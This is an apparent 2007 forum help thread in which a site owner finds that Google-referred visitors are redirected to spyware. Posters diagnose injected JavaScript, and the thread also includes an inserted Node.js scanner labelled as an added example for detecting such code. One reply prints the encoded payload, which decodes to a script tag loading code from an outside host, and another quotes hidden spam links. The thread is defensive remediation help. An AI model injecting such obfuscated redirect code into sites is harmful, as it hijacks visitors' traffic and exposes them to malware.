

Can someone explain this mysterious page hijacking in Google?
November 27, 2007 10:40 AM

Can someone explain this mysterious page hijacking in Google search results?

Something really weird is happening involving Mrs. ManInSuit's web site, Google, and maybe some other factor I can't understand.

For some reason, her site has been taken over by some creepy spyware site, but only when linked to through google search results.

Here’s the deal:

- I open Firefox.
- I go to google, and type "Margaux Williamson" (with quotes)
- The first hit is www.margauxwilliamson.com. That's her site.
- I click that link.
- A weird scary spyware site comes up.

What's super strange is- If I just paste www.margauxwilliamson.com into the address box, everything is fine.

I tried it on my computer, and her computer, and phoned a friend to have him try it. We all got the same weird result. (The friend is nearby, and on the same ISP, so maybe it's specific to that.)

Anyone have any idea what might be the cause of this? I'm baffled!
posted by ManInSuit to Computers & Internet (20 answers total) 1 user marked this as a favorite
 
Oh and - I searched around a bit, and at first thought it might be a google-302-hijacking. But it doesn't look like that...
posted by ManInSuit at 10:44 AM on November 27, 2007


Could it be some kind of referrer hack? Someone's hacked into her website and is redirecting people if the referrer (i.e. the page they came from) is Google, but not if the referrer is blank?

There seems to be some weird encoded JavaScript in the source to that page.
posted by TheophileEscargot at 10:49 AM on November 27, 2007


Works fine over here...

Are you using internet explorer? try in firefox, it's probably a "toolbar" that is "assisting" you.

Run spybot/etc and make sure you uninstall any toolbars that programs have helped you out by installing behind your back.

Use Firefox with the noscript extension.
posted by iamabot at 10:51 AM on November 27, 2007


Fascinating. If you look at the source for the page, it decodes the following:
"60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!116!117!110!105!113!117!101!46!105!110!47!105!110!99!108!117!100!101!115!47!106!115!47!115!105!116!101!115!46!106!115!34!62!60!47!115!99!114!105!112!116!62!"
and writes it to the page on load. If you decode that through the fromCharCode() function in javascript, it's embedding http://tunique.in/includes/js/sites.js into the page at load time. If you look at that script, you'll see that it's looking for search engine referers, stripping out the search terms used, and sending visitors off to some spammer with those terms included. You need to wipe that section out of the page (everything between [/head] and [body]), and then figure out how you got compromised in the first place.
posted by Partial Law at 10:53 AM on November 27, 2007 [1 favorite]
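
Added example, not part of the original thread or any poster's code: a Node.js sketch of the manual check described in the post above, scanning page source for long runs of character codes and decoding them to see what script they inject. The function names and the surrounding sample HTML are assumptions made for illustration; only the encoded string comes from the post, and the scan also accepts separators other than "!".

```javascript
// Encoded string exactly as quoted in the post above, split only for line length.
const ENCODED_FROM_POST =
  "60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!32!" +
  "115!114!99!61!34!104!116!116!112!58!47!47!116!117!110!105!113!117!101!46!105!110!47!" +
  "105!110!99!108!117!100!101!115!47!106!115!47!115!105!116!101!115!46!106!115!34!62!" +
  "60!47!115!99!114!105!112!116!62!";

// Constructed page source (hypothetical): the run sits in a script between </head> and <body>.
const SAMPLE_PAGE =
  "<html><head><title>t</title></head>\n" +
  '<script>var s = "' + ENCODED_FROM_POST + '"; Decode();</script>\n' +
  "<body><p>Phone: 416!555!0100</p></body></html>";

// Turn "60!115!99!..." into text; null if any item is not a byte-sized integer.
function decodeCharCodes(run, sep) {
  const codes = run.split(sep).filter((p) => p !== "").map(Number);
  if (codes.some((c) => !Number.isInteger(c) || c > 255)) return null;
  return String.fromCharCode(...codes);
}

// Find long runs of 1-3 digit numbers joined by one repeated punctuation separator,
// decode each, and report what it hides. minCodes filters out dates, phone numbers, etc.
function findEncodedScripts(html, minCodes = 20) {
  const findings = [];
  const runRe = /\d{1,3}(?:([^\w\s<>"'])\d{1,3})(?:\1\d{1,3})+\1?/g;
  for (const m of html.matchAll(runRe)) {
    const sep = m[1];
    if (m[0].split(sep).filter(Boolean).length < minCodes) continue;
    const decoded = decodeCharCodes(m[0], sep);
    if (decoded === null) continue;
    // Pull out the external script URL, if the decoded text is a <script src=...> tag.
    const src = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(decoded);
    findings.push({ offset: m.index, decoded, scriptSrc: src ? src[1] : null });
  }
  return findings;
}

for (const f of findEncodedScripts(SAMPLE_PAGE)) {
  console.log(`offset ${f.offset}: ${f.decoded} (external script: ${f.scriptSrc})`);
}
```

Running the same scan over every file in a fresh download of the site shows whether other pages carry the same injected block.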


Uh yeah, you need to call the site's owner/operator:
Script does a bunch of decoding to hide its nature from cursory inspection
Then does this:

Decode();
//-->
/SCRIPT>
div style="overflow:auto; visibility:hidden; height: 1px; ">
a href="/new/free/the/index.php">porn girls sex

posted by iamabot at 10:53 AM on November 27, 2007


I get it in Firefox. Two times I got just a parked domain full of ads and the third time I got the scary spyware download attempts.
posted by winston at 10:54 AM on November 27, 2007


Just wanted to say Googling it for me does bring up either a scary spyware dialog box or one of those "what you need when you need it" squatter pages.
posted by ALongDecember at 10:55 AM on November 27, 2007


iamabot - Just tried: it happens in IE too, not just Firefox
posted by ManInSuit at 11:00 AM on November 27, 2007


Yeah, it's my noscript plugin that prevents these kinds of shenanigans. You have some javascript on the page that is indeed hijacking it.
posted by iamabot at 11:02 AM on November 27, 2007


Partial Law (and others who nailed this):

Wow!! That's crazy.

Let me make sure I have this right:

Someone has hacked my partner's site, and changed the home page in such a way that it redirects to another site *only if* the referer is from google. Yes?

That's amazing.

Why would they do that?

I'll go look at the page and see what I can determine...
posted by ManInSuit at 11:03 AM on November 27, 2007


I get the same wacky redirect in Safari, too.

I've noticed similar things a lot lately with Google results. Clicking on the first results on a lot of searches sends me to similar "generic" link sites. It's almost as if these sites are sniffing search requests on Google's end and somehow inserting themselves into the results.
posted by Thorzdad at 11:11 AM on November 27, 2007


Why would they do that?

They are probably hoping that you never check your search results in Google. Potential visitors get redirected, but you would never find out unless you clicked the Google link or heard from someone who did. Just hijacking the page would be much more easily detected.
posted by burnmp3s at 11:12 AM on November 27, 2007


I would guess they would do that so the owner wouldn't notice it was hacked right away, as they would type in the site directly rather than search for it. More likely to stay up that way.
posted by shinynewnick at 11:12 AM on November 27, 2007


Why would they do that?

Because they want to steal as much of your traffic as they can while not alerting you (the site developer/owner) to the fact that your site has been hacked, of course.
posted by ikkyu2 at 11:12 AM on November 27, 2007


Burn, Shiny, Ik = Oh! Of course. That makes sense.


I went to the site and downloaded index.cfm from the ftp server. (The site's on a shared hosting plan Crystaltech. My partner does most of the maintenance herself, and I help a bit...) Yup - there's the offending code, right in the page. (As opposed to, say, added by the server or some weird thing like that).


I'm so not a security expert. I have no idea how the page would have been hacked. (I'm guessing it's some random script, by ftp, catching the only-okay password)?

I'm also not sure what I do next. I'm guessing:

- Change the ftp password.
- Take the offending code out of the page

Should I inform the ISP, too?
Anything else I should do?
posted by ManInSuit at 11:16 AM on November 27, 2007


I would inform the ISP, in case it was something server related. Although, there is the possibility that they'd take down your site temporarily if it is an extended security risk (complete speculation on my part - no clue about ISP stuff).

Definitely change all passwords, and I would recommend doing a complete fresh upload of the site sooner rather than later. There might be more things hidden in the code across the site.
posted by shinynewnick at 11:24 AM on November 27, 2007 [1 favorite]


I've fixed the pages, changed the passwords, and notified the ISP. Shiny - I'll reupload the site, too.

(For the curious - the old hacked versions of the pages are still there at old_index.cfm and old_index.html)

Thanks everyone for your help!
posted by ManInSuit at 11:53 AM on November 27, 2007


The server should probably be reformatted; chances are the hole is still there. Check out Snort and Tripwire.
posted by Mach5 at 3:13 PM on November 27, 2007


It appears to be some co-ordinated exploit.
posted by everichon at 3:39 PM on November 27, 2007


Now that you've fixed your web page, you need to be concerned about whether your computer has been compromised. Time to run anti-virus and anti-malware checkers, I think.
posted by Steven C. Den Beste at 3:50 PM on November 27, 2007

